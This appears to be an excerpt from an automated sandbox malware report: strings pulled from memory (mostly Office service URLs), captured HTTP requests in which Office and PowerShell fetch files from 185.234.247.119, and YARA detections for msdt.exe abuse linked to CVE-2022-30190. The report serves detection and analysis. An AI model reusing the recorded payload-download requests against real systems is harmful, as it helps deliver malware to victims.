                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types$r
                          Source: regsvr32.exe, 00000028.00000002.580138972.00000000007D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types-IWSDLPublish
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types7r
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesAr1
                          Source: 68101181_048154.imgString found in binary or memory: http://www.borland.com/namespaces/TypesU
                          Source: 68101181_048154.imgString found in binary or memory: http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish
                          Source: regsvr32.exe, 00000026.00000002.580066924.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typeskr
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.aadrm.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.aadrm.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.addins.store.office.com/app/query
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.cortana.ai
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.diagnostics.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.diagnosticssdf.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.microsoftstream.com/api/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.office.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.onedrive.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://apis.live.net/v5.0/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://augloop.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://augloop.office.com/v2
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://autodiscover-s.outlook.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cdn.entity.
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://clients.config.office.net/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://config.edge.skype.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cortana.ai
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cortana.ai/api
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://cr.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dataservice.o365filtering.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dataservice.o365filtering.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dev.cortana.ai
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://devnull.onenote.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://directory.services.
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://entitlement.diagnostics.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://graph.ppe.windows.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://graph.ppe.windows.net/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://graph.windows.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://graph.windows.net/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://incidents.diagnostics.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://invites.office.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://lifecycle.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://login.microsoftonline.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://login.windows.local
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://management.azure.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://management.azure.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://messaging.engagement.office.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://messaging.office.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://ncus.contentsync.
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://ncus.pagecontentsync.
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://officeapps.live.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://onedrive.live.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://onedrive.live.com/embed?
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://osi.office.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://otelrules.azureedge.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://outlook.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://outlook.office.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://outlook.office365.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://outlook.office365.com/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://pages.store.office.com/review/query
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://powerlift.acompli.net
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://roaming.edog.
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://settings.outlook.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://shell.suite.office.com:1443
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://skyapi.live.net/Activity/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://staging.cortana.ai
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://store.office.cn/addinstemplate
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://store.office.de/addinstemplate
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://tasks.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://web.microsoftstream.com/video/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://webshell.suite.office.com
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://wus2.contentsync.
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://wus2.pagecontentsync.
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                          Source: 87E203A5-891F-43FE-BEFA-581865619F97.9.drString found in binary or memory: https://www.odwebp.svc.ms
                          Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /1240405476.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                          Source: 00000013.00000002.807689748.0000000003340000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                          Source: 00000013.00000002.807640335.0000000003050000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                          Source: 00000013.00000002.805909900.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                          Source: 00000013.00000002.806003549.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                          Source: Process Memory Space: msdt.exe PID: 6148, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
